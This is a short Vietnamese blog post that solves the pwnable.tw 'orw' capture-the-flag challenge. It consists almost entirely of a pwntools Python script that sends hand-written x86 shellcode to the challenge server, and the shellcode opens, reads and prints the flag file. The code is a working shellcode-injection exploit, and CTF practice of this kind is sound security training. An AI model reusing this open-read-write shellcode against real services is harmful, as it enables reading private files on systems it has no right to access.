Shell xịn ( orw – pwnable.tw )

from pwn import *


shell_read = asm("xor  ecx,ecx;\
				mul  ecx;\
				mov  al,0x5;\
				push  ecx;\
				push  0x67616c66;\
				push  0x2f77726f;\
				push  0x2f656d6f;\
				push 0x682f2f2f;\
				mov  ebx,esp;\
				int  0x80;\
				xchg  ebx,eax;\
				xchg  ecx,eax;\
				mov  al,0x3;\
				xor  edx,edx;\
				mov  dx,0xfff;\
				inc  edx;\
				int  0x80;\
				xchg  edx,eax;\
				xor  eax,eax;\
				mov  al,0x4;\
				mov  bl,0x1;\
				int  0x80;\
				xchg  ebx,eax;\
				int  0x80")


conn = remote("chall.pwnable.tw",10001)

rec_1 = conn.recvuntil("Give my your shellcode:")
print rec_1

conn.sendline(shell_read)

Trả lời

Điền thông tin vào ô dưới đây hoặc nhấn vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s